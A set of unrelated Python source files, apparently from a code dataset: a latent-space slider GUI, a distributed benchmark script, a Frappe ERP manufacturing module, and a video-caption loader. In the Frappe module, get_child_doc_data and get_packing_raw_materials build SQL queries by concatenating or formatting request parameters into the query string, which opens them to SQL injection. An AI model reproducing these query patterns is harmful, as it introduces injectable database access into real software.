_n_decoded = n(_m_decoded)
_x_decoded_mean = decoder_mean(_n_decoded)
generator = Model(decoder_input, _x_decoded_mean)
numpoints = 2
np.random.seed(int(time.time()))
type = "existing"
pylab.figure(num=1, figsize=(10,10))
ax = pylab.subplot(111)
pylab.subplots_adjust(left=0.3, bottom=0.4)
l = ax.imshow(np.array([[1]+[0]*599]*600, dtype='int64'), cmap="Greys", animated=True)
#pylab.axis([0, 1, -10, 10])
lower = -20
upper = 20
axcolor = 'lightgoldenrodyellow'
axes = []
sliders = []
for x in range(16):
axes.append(pylab.axes([0.15, x*.025, 0.75, 0.01], axisbg=axcolor))
for x in range(16):
sliders.append(Slider(axes[x], str(x), lower, upper, valinit=0))
def update(val):
values = [sliders[x].val for x in range(16)]
data = process(generator.predict((np.array(values)).reshape((1,16))).reshape(96,96), 600, 600)
l.set_data(data)
pylab.draw()
[sliders[x].on_changed(update) for x in range(16)]
resetax = pylab.axes([0, 0.025, 0.1, 0.04])
resetb = Button(resetax, 'Random', color=axcolor, hovercolor='0.975')
def reset(event):
val = genvec(type=type, x_train=x_train, encoder=encoder)
print(val)
for x in range(16):
print(val[0][x])
sliders[x].set_val(val[0][x])
resetb.on_clicked(reset)
savax = pylab.axes([0, 0.2, 0.1, 0.04])
savb = Button(savax, 'Save', color=axcolor, hovercolor='0.975')
def save(event):
values = []
for x in range(16):
try:
values.append(float("{0:.3f}".format(sliders[x].val[0])))
except:
values.append(float("{0:.3f}".format(sliders[x].val)))
print(values)
print()
savb.on_clicked(save)
loadax = pylab.axes([0, 0.1, 0.1, 0.04])
loadb = Button(loadax, 'Load', color=axcolor, hovercolor='0.975')
def load(event):
values = input("Enter character vector:")
values = values[1:-1]
values = values.replace(" ", "")
values = values.split(",")
values = [float(x) for x in values]
for x in range(16):
sliders[x].set_val(values[x])
loadb.on_clicked(load)
pylab.show()
# Various figures for omniglot_16_1
#arabic numeral 4: [-15.33, -100, -40.33, -16, 52.33, 43.67, -60.67, 98.67, -28.33, 48.33, 91, 45.33, 64.33, -14, 66.33, -100]
#also a 4: [7.667, -100.0, -39.0, -9.0, 15.667, 54.667, -53.333, 95.0, -64.333, 55.0, 80.333, 61.333, 84.333, -55.667, 75.333, -49.333]
#distance between latent vectors may not be a good similarity metric
# u and a sideways J above it [-5.433, -10.0, 7.933, 8.367, 3.767, -1.733, -3.867, -3.267, -1.8, -9.733, -3.7, -5.433, -10.0, 2.067, 5.033, -1.433]
# circle with lines coming off top and bottom [-5.433, 5.2, 7.933, 8.367, 3.767, -1.733, -3.867, -3.267, -1.8, -9.733, -3.7, -5.433, -10.0, 2.067, 5.033, -1.433]
# perpendicularity symbol with hat [-5.6, -8.167, 6.467, -10.0, -10.0, 0.3, 3.833, 2.133, 0.833, 1.567, 4.667, -7.233, -10.0, -10.0, -10.0, 3.2]
# bowl with line over it [3.567, 4.733, -4.133, -1.533, -10.0, -10.0, 10.0, -0.733, -10.0, -3.9, -0.4, -10.0, 4.733, -5.633, -2.733, 1.1]
# ladder on its side: [3.033, 7.433, 2.033, 7.367, 5.6, -4.6, 10.0, 10.0, -9.567, -4.033, 4.9, -4.367, 1.2, 10.0, 2.4, 10.0]
# plus sign, but the the left and bottom forming a loop and the right bent 90 degrees upward [-1.667, -10.6, -20.0, -13.867, 6.8, -6.533, -5.933, -20.0, -20.0, 20.0, 20.0, 15.533, -20.0, -20.0, -4.333, 3.0]
# T crossed with mirrored J, but with a really sharp angle on the mirrored J [-20.0, 4.933, 7.933, 2.8, 3.533, -20.0, 20.0, 15.733, -20.0, 20.0, 6.2, -3.333, 5.533, -5.267, -6.267, 0.733]
# tall vertical line with smaller vertical lines on both sides [6.4, 16.6, -4.267, -0.533, 8.667, 3.0, -1.067, -0.267, -0.4, -1.2, -6.467, 0.667, -11.467, -5.267, -4.4, -4.333]
# the left edge of nevada with a little curly bit coming off the shallow angle [1.733, 20.0, 10.133, 13.933, -11.0, -14.6, -13.667, 6.867, -4.2, -2.867, 8.933, 14.4, 3.533, 11.067, -16.6, -7.867]
# lowish aspect ratio rectangle with line pointing upward coming off left upper corner [18.8, 4.067, -2.6, 6.667, -15.667, 17.8, 4.667, -16.067, -2.867, 7.467, 15.267, 7.933, 5.6, -4.667, 3.2, 16.867]
# vertical line with line coming off to right and sharply bending down on top and short line coming off to right on bottom [1.0, 20.0, 20.0, -20.0, -11.867, 20.0, -3.733, -20.0, -8.0, -20.0, 20.0, -20.0, -1.333, -12.067, 2.4, -20.0]
# I [10.0, -5.4, -2.867, -6.133, -16.2, -10.067, 6.933, 1.067, -14.6, -1.267, -2.333, -16.933, 10.133, -20.0, -20.0, -1.133]
# weird thing (W with a Y as the middle?) [20.0, 8.933, -8.8, 15.067, -20.0, 5.133, -3.2, -5.8, -20.0, 8.8, 20.0, 14.8, 9.4, 20.0, -6.733, 13.933]
# perpendicularity symbol [7.533, -20.0, 9.333, 14.467, 4.467, -7.067, 0.067, -20.0, 4.733, -3.067, 7.933, -12.333, 2.333, -4.133, -20.0, 20.0]
# sorta a W but with left bent things on the left two and a short right one [-0.592, -4.437, -1.53, 3.726, 1.723, -5.548, -7.522, -13.294, -19.16, -2.086, 12.332, 8.667, -18.933, 11.0, -13.267, 20.0]
# a thing [14.027, 13.222, -12.16, -11.198, 9.491, 19.545, 9.137, 6.489, -15.164, 1.695, -6.774, 6.257, 0.994, -3.902, -20.0, -6.467]
# capital letter H [-0.467, 1.8, -2.133, -0.667, 2.2, 4.533, 2.467, 4.533, -6.4, -0.667, 1.0, -0.2, 0.6, -1.6, -1.267, -0.4]
| StarcoderdataPython |
1743397 | <filename>experiments/perf_exp_2_das.py
from datetime import datetime
import socket
import os
import csv
import logging
import time
import sys
from experiment import Experiment
from system import DasSystem
import perf_exp_2
def main(order_on_write, read_heavy):
logging.basicConfig(format='%(asctime)s.%(msecs)03d - %(levelname)-8s: %(message)s',
level=logging.WARNING,datefmt='%d-%m-%y %H:%M:%S')
hostnames = os.getenv('HOSTS').split()
hostname = socket.gethostname()
system = DasSystem(num_clients=10, port=25000, order_on_write=order_on_write)
if hostname != hostnames[0]:
system.start()
return
time.sleep(15)
read_factor = 2 if read_heavy else 1
write_factor = 1 if read_heavy else 2
experiment = Experiment(
experiment_name='Performance Experiment 2',
systems=[system],
n_writes=100000 * write_factor,
n_reads=100000 * read_factor,
)
# Run experiment 5 times
print("{}".format(experiment.__str__()))
start = time.perf_counter()
exp_func = perf_exp_2.read_heave_exp_func if read_heavy else perf_exp_2.write_heavy_exp_func
results = list(experiment.run_multi_client(exp_func, repeat=1))[0]
columns = ["system_name", "run_id", "latency", "operation", "on_leader", "n_nodes", "n_clients", "order_on_write"]
filename = "./results/experiment2_{}_{}_{}.csv".format(order_on_write, read_heavy, datetime.today().strftime("%Y%m%d%H%M%S"))
with open(filename, 'w', encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(columns)
writer.writerows(results)
end = time.perf_counter()
print('Time: ', end-start)
if __name__ == '__main__':
order_on_write = len(sys.argv) > 1 and int(sys.argv[1]) == 1
read_heavy = len(sys.argv) > 2 and int(sys.argv[2]) == 1
main(order_on_write, read_heavy)
| StarcoderdataPython |
8082269 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright (c) 2020, Frappe and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
import json
class PchManufacturingRecord(Document):
pass
@frappe.whitelist()
def get_start_end_process_raw_materials(start_process, end_process, method):
if start_process == end_process:
start_process_raw_item_data = get_pro_order_wise_manufacture_method_details_raw_items(start_process,
start_process, method)
return start_process_raw_item_data
else:
# product_order_wise_data_start
# end_process_raw_item_data = get_manufacture_method_details_raw_items(end_process)
start_end_process_raw_materials_data = get_pro_order_wise_manufacture_method_details_raw_items(start_process,
end_process,
method)
return start_end_process_raw_materials_data
@frappe.whitelist()
def get_start_end_process_raw_materials_for_packing(start_process, end_process, method ,item_made_list):
item_made_list_packing_raw_materials = get_pro_order_wise_manufacture_method_details_raw_items(start_process,start_process, method,item_made_list)
return item_made_list_packing_raw_materials
# product_ordee_wise_data_end
@frappe.whitelist()
def get_start_end_p_process_details(start_process, end_process, method):
if start_process == end_process:
start_process_raw_item_data = get_pro_order_wise_process_details(start_process, start_process, method)
return start_process_raw_item_data
else:
# product_order_wise_data_start
# end_process_raw_item_data = get_manufacture_method_details_raw_items(end_process)
start_end_process_raw_materials_data = get_pro_order_wise_process_details(start_process, end_process, method)
return start_end_process_raw_materials_data
def get_pro_order_wise_process_details(start_process, end_process, method):
start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": start_process},
"process_order")
end_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": end_process},
"process_order")
mmd_process_details = frappe.db.sql("""select
mmd.name,mmd.pch_process,mmd.pch_method,mmd.process_order,mmd.turnaround_time,mmd.touch_points
from
`tabPch Manufacturing Method Details` mmd
where
mmd.process_order>=%s and mmd.process_order<= %s and mmd.pch_method= %s order by mmd.process_order asc""",
(start_process_pro_ord_no, end_process_pro_ord_no, method), as_dict=1)
return mmd_process_details
def get_pro_order_wise_manufacture_method_details_raw_items(start_process, end_process, method):
start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": start_process},
"process_order")
end_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": end_process},
"process_order")
manufacture_method_details_raw_items = frappe.db.sql("""select
mmd.name,mmd.pch_process,mmdi.item_code,mmdi.item_name,mmdi.qty_uom,mmdi.qty_per_unit_made,mmdi.consumption_type,mmdi.stock_uom,mmdi.conversion_factor,mmdi.operand,mmdi.qty_in_stock_uom
from`tabPch Manufacturing Method Details` mmd,`tabPch Manufacturing Method Details RM Child` mmdi where
mmd.name=mmdi.parent and process_order>=%s and process_order<= %s and pch_method= %s """,
(start_process_pro_ord_no, end_process_pro_ord_no, method),
as_dict=1)
return manufacture_method_details_raw_items
#for packing
@frappe.whitelist()
def get_packing_raw_materials(multiple_method_items,start_process,end_process):
multiple_method_items = json.loads(multiple_method_items)
start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": start_process},"process_order")
end_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details", {"name": end_process},"process_order")
item_made_json ={}
for multiple_method_item in multiple_method_items:
item_made_json[multiple_method_item.get("item_made")] = multiple_method_item.get("units_s_r")
print("item_made_json", item_made_json)
item_made_list_str = ','.join("'{0}'".format(item_made) for item_made, ob_data in item_made_json.items())
print("item_made_list_str", item_made_list_str)
query = "select mmd.name,mmd.pch_process,mmd.item_code as item_made,mmdi.item_code,mmdi.item_name,mmdi.qty_uom,mmdi.qty_per_unit_made,mmdi.consumption_type,mmdi.stock_uom,mmdi.conversion_factor,mmdi.operand,mmdi.qty_in_stock_uom from`tabPch Manufacturing Method Details` mmd,`tabPch Manufacturing Method Details RM Child` mmdi where mmd.name=mmdi.parent and mmd.process_order>={0} and mmd.process_order<= {1} and mmd.item_code in ( {2} )".format(start_process_pro_ord_no,end_process_pro_ord_no,item_made_list_str)
print ("query",query)
packing_raw_materials = frappe.db.sql(query, as_dict=1)
return packing_raw_materials
@frappe.whitelist()
def get_child_doc_data(doc_type, parent):
table = "tab" + doc_type
# table='`tab'+doc_type+'`'
sql = "select * from `" + table + "` where parent='" + parent + "'"
# sql = "select * from `"+table+"`"
doc_data = frappe.db.sql(sql, as_dict=1)
return doc_data
@frappe.whitelist()
def get_wh_ac_to_location(location_name, wh_type, process):
wh_name_dic = frappe.db.sql(
"""select outbound_warehouse,inbound_warehouse from `tabPch Locations Child` where parent = %s and process_name = %s """,
(location_name, process), as_dict=1)
return wh_name_dic[0][wh_type] if wh_name_dic else None
# Ak
@frappe.whitelist()
def validate_start_and_end_process(start_process, end_process):
flag = 1;
st_list = frappe.db.sql(
"""select `process_order` as `start_process_order` from `tabPch Manufacturing Method Details` where name=%s""",
(start_process), as_dict=1);
en_list = frappe.db.sql(
"""select `process_order` as `end_process_order` from `tabPch Manufacturing Method Details` where name=%s""",
(end_process), as_dict=1);
start_process_order_value = st_list[0]["start_process_order"];
end_process_order_value = en_list[0]["end_process_order"];
if (start_process_order_value > end_process_order_value):
# print('End process cannot occur before start process');
flag = 0;
return flag
# raw_material_transactions_start
# pch_locations_id,items
# issue from raw material wh of location
@frappe.whitelist()
def send_material_for_manufacturing(entity):
entity = json.loads(entity)
item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
"item_payload_account")
units = entity.get("units_to_be_sr");
location = entity.get("location");
company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
raw_material_warehouse = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
"raw_material_warehouse")
start_process_pro_ord_no = frappe.db.get_value("Pch Manufacturing Method Details",
{"name": entity.get("start_process")}, "process_order")
# issue_start
issue_items_list = []
for i_row in entity.get("req_items"):
item_dic = {
"item_code": i_row.get("item_code"),
# making a change here "qty":i_row.get("total_qty") was the code before this
"qty": i_row.get("dispatched_quantity_in_uom"),
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"t_wh": None,
"s_wh": raw_material_warehouse,
"item_payload_account": item_payload_account
}
issue_items_list.append(item_dic)
se_issue_entity = {"action": "Material Issue", "items_list": issue_items_list, "company": company}
# print "se_issue_entity",se_issue_entity
se_issue = create_stock_entry(se_issue_entity)
# issue_end
response = [];
if se_issue[0]["Exception"] == "Not Occured":
# issue is done #call_next_transaction #material_rec
# Response JSON to validate Stock Entry Creation
response.append({"Name": se_issue[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Issue"});
# transfer is must
trans_entity = {
"items": entity.get("method_items"),
"s_wh": entity.get("outbound_warehouse"),
"t_wh": entity.get("target_warehouse"),
"units_to_be_sr": entity.get("units_to_be_sr"),
"company": company
}
labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
trans_entity["labour_account"] = labour_account
trans_entity["isAdditionCost"] = 1
trans_entity["add_amount"] = frappe.db.get_value("Stock Entry", {"name": se_issue[0]["Name"]},
"total_outgoing_value")
trans_entity["item_payload_account"] = item_payload_account
# transfer is must
start_process_pro_ord_no = int(start_process_pro_ord_no)
if start_process_pro_ord_no == 1:
# print "se_issue created 3t:",se_issue
# receipt fetch method item #Pch Manufacturing Record Child Method (method_items)
receipt_items_list = []
for i_row in entity.get("method_items"):
val = i_row.get("qty_made")
actual_qty = units * val;
item_dic = {
"item_code": i_row.get("item_made"),
"qty": actual_qty,
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"t_wh": entity.get("outbound_warehouse"),
"s_wh": None,
"item_payload_account": item_payload_account
}
receipt_items_list.append(item_dic)
se_rec_entity = {"action": "Material Receipt", "items_list": receipt_items_list, "company": company}
# print "se_rec_entity data",se_rec_entity
se_receipt = create_stock_entry(se_rec_entity)
if se_receipt[0]["Exception"] == "Not Occured":
# print "se_receipt created ",se_receipt
# print "transfer data ",trans_entity
response.append(
{"Name": se_receipt[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Receipt"});
se_transfer3 = make_transfer(trans_entity)
if se_transfer3[0]["Exception"] == "Not Occured":
response.append({"Name": se_transfer3[0]["Name"], "Status": "Created",
"Stock Entry Type": "Material Transfer"});
# return response
# print "se_transfer3 created ",se_transfer3
else:
response.append({"Name": se_transfer3[0]["Name"], "Status": "Not Created",
"Stock Entry Type": "Material Transfer"});
doc1 = frappe.get_doc("Stock Entry", se_issue[0]["Name"]);
doc1.docstatus = 2
doc1.save()
doc2 = frappe.get_doc("Stock Entry", se_receipt[0]["Name"]);
doc2.docstatus = 2
doc2.save()
else:
response.append(
{"Name": se_receipt[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Receipt"});
doc1 = frappe.get_doc("Stock Entry", se_issue[0]["Name"]);
doc1.docstatus = 2
doc1.save()
else:
# print "se_issue created 2t:",se_issue
# print "transfer data ",trans_entity
se_transfer2 = make_transfer(trans_entity)
# print "se_transfer2 created ",se_transfer2
if se_transfer2[0]["Exception"] == "Not Occured":
response.append(
{"Name": se_transfer2[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
else:
response.append({"Name": se_transfer2[0]["Name"], "Status": "Not Created",
"Stock Entry Type": "Material Transfer"});
doc1 = frappe.get_doc("Stock Entry", se_issue[0]["Name"]);
doc1.docstatus = 2
doc1.save()
#print(response)
else:
# print "se_transfer3 created ",se_transfer3
response.append({"Name": se_issue[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Issue"});
#print(response)
return response
@frappe.whitelist()
def receive_material_for_manufacturing(entity):
entity = json.loads(entity)
labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
"item_payload_account")
units = entity.get("units_s_r")
location = entity.get("location");
company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
response = [];
# make_transfer
# from method_item table Subcontractor Warehouse== sourch wh and Receiving Warehouse==
transfer_items_list = []
for i_row in entity.get("method_items"):
val = i_row.get("qty_made")
actual_qty = units * val;
item_dic = {
"item_code": i_row.get("item_made"),
"qty": actual_qty,
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"s_wh": entity.get("target_warehouse"), # subcontractor wh
"t_wh": entity.get("receiving_warehouse"), # receiving_warehouse
"item_payload_account": item_payload_account
}
transfer_items_list.append(item_dic)
se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
se_trans_entity["add_amount"] = entity.get("subcontracting_rate") * entity.get("units_s_r")
se_trans_entity["labour_account"] = labour_account
se_trans_entity["isAdditionCost"] = 1
se_transfer = create_stock_entry(se_trans_entity)
# print(se_transfer,"-----------------------------------------------");
if (se_transfer[0]["Exception"] == "Not Occured"):
# response.append({"Name":se_transfer,"Status":"Created"});
response.append({"Name": se_transfer[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
# print(response)
# return response
else:
response.append(
{"Name": se_transfer[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Transfer"});
# response.append({"Name":se_transfer,"Status":"Not Created"});
# print(response)
return response
#packing type suresh
#create issue data first.use same logic of send material for manufacturing
@frappe.whitelist()
def send_material_for_packing(entity):
entity = json.loads(entity)
response = []
#print "entity send_material_for_packing" ,entity
labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},"item_payload_account")
company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
raw_material_warehouse = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},"raw_material_warehouse")
#new code start
#on transfer and one issue for each item made .if one fails cancel all previous ones
#store all trnsactions in a list and cancell in one go
raw_trans_id_list =[]
for im_row in entity.get("multiple_method_items"):
issue_items_list = []
#print "came inside item made ",im_row.get("item_made")
for i_row in entity.get("req_items"):
if im_row.get("item_made") == i_row.get("item_made") :
#print "if passed"
issue_item_dic = {
"item_code": i_row.get("item_code"),
"qty": i_row.get("dispatched_quantity_in_uom"),
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"t_wh": None,
"s_wh": raw_material_warehouse,
"item_payload_account": item_payload_account
}
issue_items_list.append(issue_item_dic)
#create issue for each item made raw materials
se_issue_entity = {"action": "Material Issue", "items_list": issue_items_list, "company": company}
se_issue = create_stock_entry(se_issue_entity)
transfer_items_list = []
if se_issue[0]["Exception"] == "Not Occured":
raw_trans_id_list.append( se_issue[0]["Name"])
response.append({"Name": se_issue[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Issue"});
#create transfer for each item made
trans_item_dic = {
"item_code": im_row.get("item_made"),
"qty": im_row.get("units_s_r"),
"uom": im_row.get("qty_uom"),
"conversion_factor": im_row.get("conversion_factor"),
"s_wh": entity.get("outbound_warehouse"),
"t_wh": entity.get("target_warehouse"),
"item_payload_account": item_payload_account
}
transfer_items_list.append(trans_item_dic)
se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
se_trans_entity["add_amount"] = frappe.db.get_value("Stock Entry", {"name": se_issue[0]["Name"]},"total_outgoing_value")
se_trans_entity["labour_account"] = labour_account # only for send material for manufacturing
se_trans_entity["isAdditionCost"] = 1
se_transfer2 = create_stock_entry(se_trans_entity)
if se_transfer2[0]["Exception"] == "Not Occured":
raw_trans_id_list.append(se_transfer2[0]["Name"])
response.append({"Name": se_transfer2[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
else:
cancel_raw_transactions(raw_trans_id_list)
response.append({"Name": se_transfer2[0]["Name"], "Status": "Not Created","Stock Entry Type": "Material Transfer"});
break
else:
cancel_raw_transactions(raw_trans_id_list)
response.append({"Name": se_issue[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Issue"});
break
#new code end
return response
def cancel_raw_transactions(raw_trans_id_list) :
#print "custom cancel worked",raw_trans_id_list
for raw_trans in raw_trans_id_list :
doc = frappe.get_doc('Stock Entry', {'name': raw_trans})
if (doc):
doc.docstatus = 2
doc.save()
else:
frappe.throw("No such un-cancelled document")
@frappe.whitelist()
def receive_material_from_packing(entity):
entity = json.loads(entity)
#print "receive_material_from_packing",entity
labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},
"item_payload_account")
units = entity.get("units_s_r")
location = entity.get("location");
company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
response = [];
# make_transfer
# from method_item table Subcontractor Warehouse== sourch wh and Receiving Warehouse==
raw_trans_id_list = []
for i_row in entity.get("multiple_method_items"):
transfer_items_list = []
item_dic = {
"item_code": i_row.get("item_made"),
"qty": i_row.get("units_s_r"),
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"s_wh": entity.get("target_warehouse"), # subcontractor wh
"t_wh": entity.get("receiving_warehouse"), # receiving_warehouse
"item_payload_account": item_payload_account
}
transfer_items_list.append(item_dic)
se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
se_trans_entity["add_amount"] = i_row.get("packing_labour_amount")
se_trans_entity["labour_account"] = labour_account
se_trans_entity["isAdditionCost"] = 1
se_transfer = create_stock_entry(se_trans_entity)
# print(se_transfer,"-----------------------------------------------");
if (se_transfer[0]["Exception"] == "Not Occured"):
raw_trans_id_list.append(se_transfer[0]["Name"])
response.append( {"Name": se_transfer[0]["Name"], "Status": "Created", "Stock Entry Type": "Material Transfer"});
else: #need to cancel previous transactions if any one failed to create
cancel_raw_transactions(raw_trans_id_list)
response.append({"Name": se_transfer[0]["Name"], "Status": "Not Created", "Stock Entry Type": "Material Transfer"});
break
# response.append({"Name":se_transfer,"Status":"Not Created"});
# print(response)
return response
#packing type
def make_transfer(trans_entity):
transfer_items_list = []
units = trans_entity.get("units_to_be_sr");
company = trans_entity.get("company")
for i_row in trans_entity.get("items"):
val = i_row.get("qty_made")
actual_qty = units * val;
item_dic = {
"item_code": i_row.get("item_made"),
"qty": actual_qty,
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"s_wh": trans_entity.get("s_wh"),
"t_wh": trans_entity.get("t_wh"),
"item_payload_account": trans_entity.get("item_payload_account")
}
transfer_items_list.append(item_dic)
se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
se_trans_entity["add_amount"] = trans_entity.get("add_amount")
se_trans_entity["labour_account"] = trans_entity.get(
"item_payload_account") # only for send material for manufacturing
se_trans_entity["isAdditionCost"] = 1
se_transfer = create_stock_entry(se_trans_entity)
return se_transfer
@frappe.whitelist()
def create_stock_entry(se_entity):
#print "from create_stock_entry se_entity :",se_entity
# test
status = []
try:
se = frappe.new_doc("Stock Entry")
se.purpose = se_entity.get("action")
se.stock_entry_type = se_entity.get("action")
se.company = se_entity.get("company")
se.set('items', [])
for item in se_entity.get("items_list"):
se_item = se.append('items', {})
se_item.item_code = item["item_code"]
se_item.qty = item["qty"]
se_item.uom = item["uom"]
se_item.conversion_factor = item["conversion_factor"]
se_item.expense_account = item["item_payload_account"] # dif acc
se_item.stock_uom = frappe.db.get_value("Item", {"name": item["item_code"]}, "stock_uom")
se_item.basic_rate = 0.01
if se_entity.get("action") == "Material Transfer":
se_item.s_warehouse = item["s_wh"]
se_item.t_warehouse = item["t_wh"]
if se_entity.get("action") == "Material Issue":
se_item.s_warehouse = item["s_wh"]
if se_entity.get("action") == "Material Receipt":
se_item.t_warehouse = item["t_wh"]
if se_entity.get("isAdditionCost"):
se.set('additional_costs', [])
se_add_cost = se.append('additional_costs', {})
se_add_cost.description = "Manufacturing Record"
se_add_cost.expense_account = se_entity.get("labour_account")
se_add_cost.amount = se_entity.get("add_amount")
se.save(ignore_permissions=True)
se.submit()
frappe.db.commit()
status.append({"Name": se.name, "Exception": "Not Occured"});
except Exception as e:
status.append({"Name": se.name, "Exception": "Occured", "Exception type": e});
frappe.delete_doc("Stock Entry", se.name)
return status
# ability to create purchase invoice in future
@frappe.whitelist()
def get_method_based_on_item(item_made):
method_list = frappe.db.sql("""select parent from `tabPch Manufacturing Method Child` where item_made=%s""",
(item_made), as_dict=1);
methods = [];
length = len(method_list);
if (length == 1):
methods.append(method_list[0]["parent"]);
else:
for method in method_list:
methods.append(method.parent);
# print(methods);
return methods
@frappe.whitelist()
def cancel_s_entries(mat_issue, mat_receipt, mat_transfer):
doc1 = frappe.get_doc("Stock Entry", mat_issue);
doc2 = frappe.get_doc("Stock Entry", mat_receipt);
doc3 = frappe.get_doc("Stock Entry", mat_transfer);
# mrec=frappe.get_doc("Pch Manufacturing Record",
if (doc1):
doc1.docstatus = 2
doc1.save()
if (doc2):
doc2.docstatus = 2
doc2.save()
if (doc3):
doc3.docstatus = 2
doc3.save()
return "SE deleted"
@frappe.whitelist()
def cancel_single_se(mat_transfer):
doc1 = frappe.get_doc("Stock Entry", mat_transfer);
if (doc1):
doc1.docstatus = 2
doc1.save()
return "Single SE deleted"
@frappe.whitelist()
def move_material_internally(entity):
entity = json.loads(entity)
units = entity.get("units_s_r")
labour_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "labour_account")
item_payload_account = frappe.db.get_value("Pch Locations", {"name": entity.get("location")},"item_payload_account")
location = entity.get("location");
company = frappe.db.get_value("Pch Locations", {"name": entity.get("location")}, "company");
response = [];
# make_transfer
# from method_item table Subcontractor Warehouse== sourch wh and Receiving Warehouse==
transfer_items_list = []
for i_row in entity.get("method_items"):
val = i_row.get("qty_made");
total_qty = units * val;
item_dic = {
"item_code": i_row.get("item_made"),
"qty": total_qty,
"uom": i_row.get("qty_uom"),
"conversion_factor": i_row.get("conversion_factor"),
"s_wh": entity.get("outbound_warehouse"),
"t_wh": entity.get("receiving_warehouse"),
"item_payload_account": item_payload_account
}
transfer_items_list.append(item_dic)
se_trans_entity = {"action": "Material Transfer", "items_list": transfer_items_list, "company": company}
se_transfer = create_stock_entry(se_trans_entity)
#print(se_trans_entity);
#print(se_transfer)
if (se_transfer[0]["Exception"] == "Not Occured"):
response.append({"Name": se_transfer, "Status": "Created"});
#print(response)
return response
else:
response.append({"Name": se_transfer, "Status": "Not Created"});
#print(response)
return response
@frappe.whitelist()
def change_doc_status(name):
doc = frappe.get_doc('Pch Manufacturing Record', {'name': name, 'docstatus': ('<', 2)})
if (doc):
doc.docstatus = 2
doc.save()
else:
frappe.throw("No such un-cancelled document")
return "draft mode" | StarcoderdataPython |
3388262 | #!/usr/bin/env python3
'''
Utilities for the video data loading pipeline.
Assumes that videos are already downloaded and preprocessed.
'''
from __future__ import division
import numpy as np
import csv,pickle,os
from glob import glob
from config import *
def _to_absolute_path(fn):
'''Convert timestamped filename to its absolute path'''
return os.path.join(os.path.join(VIDEO_ROOT,fn[:-10]),'{}.npy'.format(fn))
if os.path.isfile(VIDEO_DICT):
assert os.path.isfile(WORD_INDEX_FILE)
print('Loading Video Dictionary...', end='')
video_dict = np.load(VIDEO_DICT)
with open(WORD_INDEX_FILE, 'rb') as f:
inverted_index = pickle.load(f)
print('done.')
else:
print('Generating Video Dictionary...',end='')
from tensorflow.contrib.keras.python.keras.preprocessing.text import *
with open(MSVD_PATH, encoding='utf8') as f:
r = csv.DictReader(f)
video_dict = np.array([[_to_absolute_path(row['Filename']),'SOS {} EOS'.format(row['Description'])] for row in r])
video_dict = np.unique(video_dict, axis=0)
# preprocess text and create index file
_docs = video_dict[:,1]
tk = Tokenizer()
tk.fit_on_texts(_docs)
_lengths = np.array([len(x) for x in tk.texts_to_sequences_generator(_docs)])
video_dict = video_dict[(_lengths > SENTENCE_MIN_LENGTH)*(_lengths <= SENTENCE_MAX_LENGTH)]
video_dict = video_dict[np.random.permutation(video_dict.shape[0])] # shuffle
_docs = video_dict[:,1]
tk = Tokenizer()
tk.fit_on_texts(_docs)
train_text = np.array([np.array(x) for x in tk.texts_to_sequences_generator(_docs)])
inverted_index = {v:k for (k,v) in tk.word_index.items()}
with open(WORD_INDEX_FILE, 'wb') as f:
pickle.dump(inverted_index, f)
## word_docs = tk.word_docs
## word_counts = tk.word_counts
## document_count = tk.document_count
_txt = np.zeros(train_text.shape+(SENTENCE_MAX_LENGTH,), dtype=int)
for i in range(_txt.shape[0]):
_txt[i,:train_text[i].shape[0]] = train_text[i]
train_text = _txt
train_video = video_dict[:,0]
video_dict = np.column_stack([train_video,_txt])
np.save(VIDEO_DICT, video_dict)
# To recover:
# train_video = video_dict[:,0]
# train_text = video_dict[:,1:].astype(int)
print('done.')
